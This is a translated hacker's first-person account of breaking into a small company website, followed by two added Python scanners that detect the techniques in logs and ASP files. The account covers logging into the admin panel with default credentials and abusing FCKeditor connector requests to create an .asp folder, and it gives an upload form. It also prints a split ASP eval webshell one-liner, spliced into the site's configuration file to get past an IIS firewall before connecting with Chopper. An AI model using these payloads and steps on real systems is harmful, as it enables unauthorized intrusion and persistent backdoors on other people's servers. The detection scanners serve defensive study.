One day someone in the group posted a backend login page, http://www.bkjia.com/manage/Login.asp, with the default admin account, and asked for help uploading a shell. Out of curiosity I took a look.
There was a database backup page, but some show-off had already replaced it with a plain-text defacement page.
The data backup page had been forcibly deleted. There was an upload page at http://www.bkjia.com/upload.asp, but the POST of the uploaded trojan was intercepted.
This site was not easy to deal with, so I looked elsewhere.
I found several sites and injected plenty of them, but the MD5 hashes I got all needed paid cracking, and I had no money for that.
To keep it simple, I mainly looked for backends with default passwords. There were a few, but on some the backend was unusable, and on some the upload prompt showed the POST packet being intercepted.
Finally I found a site: http://www.bkjia.com/
Backend: http://www.xxxxx.com/manage/login.asp
Dingfeng CMS (dfcms); admin/admin logged in successfully.
Looking through the backend, there are many functions: uploads, database backup (but the backups are automatic and the path cannot be customised), basic site information management (a trojan could be inserted here), and an FCKeditor editor, which is very likely to be the way through.
However, normal uploads would presumably be intercepted, and the database backup cannot be used.
Inserting into the configuration file can be left for last: if the insertion fails, or succeeds but gets blocked, the whole site may go down.
If FCKeditor is usable, try it first.
First, browse the Media directory:
http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
No problem, it can be browsed.
Then access http://www.xxxx.com/manage/Inclu...Nd=CreateFolder&Type=Media&CurrentFolder=%2Fa.asp&NewFolderName=aaaa&uuid=1279789845662
to create the .asp folder.
Go to the Media directory and create the .asp folder.
Finally, construct the upload form:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxxx.com/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=Media&CurrentFolder=%2Fa.asp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
Upload a one-liner to get a shell:
http://www.xxxxx.com/uploadfiles/media/a.asp/abc.jpg
But accessing it ran into a problem, and that damned prompt came up again:
The current webpage is temporarily inaccessible (blocked by the firewall)
No way. What now? I asked people in the group; nobody paid any attention.
A Baidu search showed it was Zhichuang's IIS firewall. It seems this noob still has a lot to learn about this kind of bypass.
I found an article on getting past Zhichuang:
When the IIS parsing vulnerability is used, the request is treated as a malicious script and is therefore blocked by the firewall.
Accessing a shell at a path like upload/1.asp/2_asp;jpg is blocked.
Accessing a shell at a path like upload/2.asp;.jpg is not blocked.
So if FCKeditor's second-upload trick could be used, it would get through. Unfortunately, the second-upload issue has been patched.
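The FCKeditor connector requests described earlier (CreateFolder with a folder name carrying a script extension, then FileUpload into that folder) and the two IIS parsing-style paths just listed are all easy to pick out of web-server logs. What follows is an added example, not code from the original post, from Zhichuang or from FCKeditor: a Python scanner run over a few constructed IIS-style access-log lines. It flags any directory segment ending in an executable extension, any filename containing ".asp;", and any connector.asp request whose CurrentFolder or NewFolderName carries such an extension. It generalises the post's .asp case to the other extensions IIS 6 maps to the ASP handler by default (.asa, .cer, .cdx); the log layout and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS-style access-log lines: date time method uri-stem uri-query status.
# Lines 2-5 mirror the requests and paths described in the post; line 6 is benign.
SAMPLE_LOG = """\
2010-07-22 10:01:02 GET /manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F 200
2010-07-22 10:01:30 GET /manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=a.asp 200
2010-07-22 10:02:10 POST /manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp Command=FileUpload&Type=Media&CurrentFolder=%2Fa.asp 200
2010-07-22 10:02:40 GET /uploadfiles/media/a.asp/abc.jpg - 403
2010-07-22 10:03:05 GET /upload/2.asp;.jpg - 200
2010-07-22 10:03:20 GET /uploadfiles/media/logo.jpg - 200
"""

# Extensions IIS 6 hands to the ASP handler by default (the post itself only mentions .asp).
EXEC_EXT = r"(?:asp|asa|cer|cdx)"
# IIS 6 parsing patterns: a directory named "x.asp/" or a filename containing ".asp;".
PARSING_DIR = re.compile(rf"/[^/]+\.{EXEC_EXT}/", re.IGNORECASE)
PARSING_SEMI = re.compile(rf"\.{EXEC_EXT};", re.IGNORECASE)
# The same extensions ending, or forming a directory inside, a connector folder parameter.
FOLDER_PARAM = re.compile(rf"\.{EXEC_EXT}(?:/|;|$)", re.IGNORECASE)


def analyse_line(line):
    """Return a list of (finding, detail) tuples for one log line; [] when it is clean."""
    parts = line.split()
    if len(parts) < 6:
        return []
    stem, query = unquote(parts[3]), parts[4]
    findings = []
    if PARSING_DIR.search(stem) or PARSING_SEMI.search(stem):
        findings.append(("iis-parsing-path", stem))
    if stem.lower().endswith("/connector.asp") and query != "-":
        # parse_qs percent-decodes the values; keys are lower-cased for lookup
        params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
        cmd = params.get("command", "").lower()
        for key in ("newfoldername", "currentfolder"):
            val = params.get(key, "")
            if FOLDER_PARAM.search(val):
                findings.append((f"fckeditor-{cmd}-script-ext", f"{key}={val}"))
    return findings


def scan_log(text):
    """Map 1-based line number -> findings, for flagged lines only."""
    report = {}
    for no, line in enumerate(text.splitlines(), 1):
        found = analyse_line(line)
        if found:
            report[no] = found
    return report


if __name__ == "__main__":
    for no, found in scan_log(SAMPLE_LOG).items():
        for kind, detail in found:
            print(f"line {no}: {kind}: {detail}")
```

Run against the sample, lines 2 to 5 are reported and line 6 is not; on a real server the same checks are worth applying to the upload directory tree itself, since a folder named a.asp persists after the log has rotated.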
The last trick is inserting into the configuration file.
Since the article says it is the IIS parsing that gets intercepted, the firewall is not actually detecting the trojan itself, so a mangled one-liner might get past it.
I decided to use this one-liner:
<%BBBB=request("aaaa")%><%eval(BBBB)%>
Appended after the company address:
"%><%BBBB=request("aaaa")%><%eval(BBBB)%><%'
Saved. No problem.
The configuration file path is given at the bottom of the page: /include/vars.asp
Accessing it directly gives a blank page, with no error and no block.
Connected with Chopper (the "kitchen knife" webshell client). Success!!!
Uploaded a trojan to try: it uploaded successfully and could be accessed.
So it seems Zhichuang only blocks IIS parsing and cannot tell whether a script is a trojan.
It also filters uploaded POST packets, but here a modified one-liner inserted through the configuration file bypassed it successfully.
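The one-liner above is split across two script blocks and spliced into a string value, so a scan for the literal eval(request(...)) alone would miss it. What follows is an added example, not code from the original post or from Dingfeng CMS: a Python scanner over a constructed vars.asp modelled on the description above. It tracks variables assigned from Request across all the <% %> blocks in a file, flags any Eval or Execute of such a variable or of Request directly, and separately flags a line where a quoted value closes one script block and immediately opens another. The file contents, variable names and layout are constructed.

```python
import re

# Constructed ASP include file modelled on the /include/vars.asp described in the post,
# after the one-liner has been spliced into the company-address value: the injected
# text closes the string and the script block, opens two new blocks (assignment from
# Request, then Eval), and comments out the rest of the original line with an apostrophe.
SAMPLE_VARS_ASP = '''<%
Dim SiteName, CompanyAddr
SiteName = "Example Co."
CompanyAddr = "No. 1 Example Road"%><%BBBB=request("aaaa")%><%eval(BBBB)%><%'"
%>
'''

# The same file before the insertion (constructed), used as a negative check.
CLEAN_VARS_ASP = '''<%
Dim SiteName, CompanyAddr
SiteName = "Example Co."
CompanyAddr = "No. 1 Example Road"
%>
'''

SCRIPT_BLOCK = re.compile(r"<%(.*?)%>", re.DOTALL)
ASSIGN_FROM_REQUEST = re.compile(r"\b(\w+)\s*=\s*request\b", re.IGNORECASE)
EVAL_CALL = re.compile(r"\b(?:executeglobal|execute|eval)\s*\(?\s*(\w+)", re.IGNORECASE)
DIRECT_EVAL = re.compile(r"\b(?:executeglobal|execute|eval)\s*\(?\s*request\b", re.IGNORECASE)
# A quoted value that closes a script block and opens another on the same line.
STRING_SPLICE = re.compile(r'"\s*%>\s*<%')


def scan_asp(source):
    """Return a list of (finding, detail) tuples for the given ASP source text."""
    findings = []
    tainted = set()  # variable names assigned from Request, kept across blocks on purpose
    for block in SCRIPT_BLOCK.finditer(source):
        body = block.group(1)
        for m in ASSIGN_FROM_REQUEST.finditer(body):
            tainted.add(m.group(1).lower())
        if DIRECT_EVAL.search(body):
            findings.append(("eval-of-request", body.strip()))
        for m in EVAL_CALL.finditer(body):
            if m.group(1).lower() in tainted:
                findings.append(("eval-of-tainted-var", body.strip()))
    for no, line in enumerate(source.splitlines(), 1):
        if STRING_SPLICE.search(line):
            findings.append(("string-splice", f"line {no}"))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_asp(SAMPLE_VARS_ASP):
        print(f"{kind}: {detail}")
    print("clean file findings:", scan_asp(CLEAN_VARS_ASP))
```

The taint set deliberately survives from one block to the next, because the whole point of the split form is that the assignment and the Eval never share a block; the string-splice check catches the insertion even if the payload names are changed, since a configuration value has no legitimate reason to end a script block.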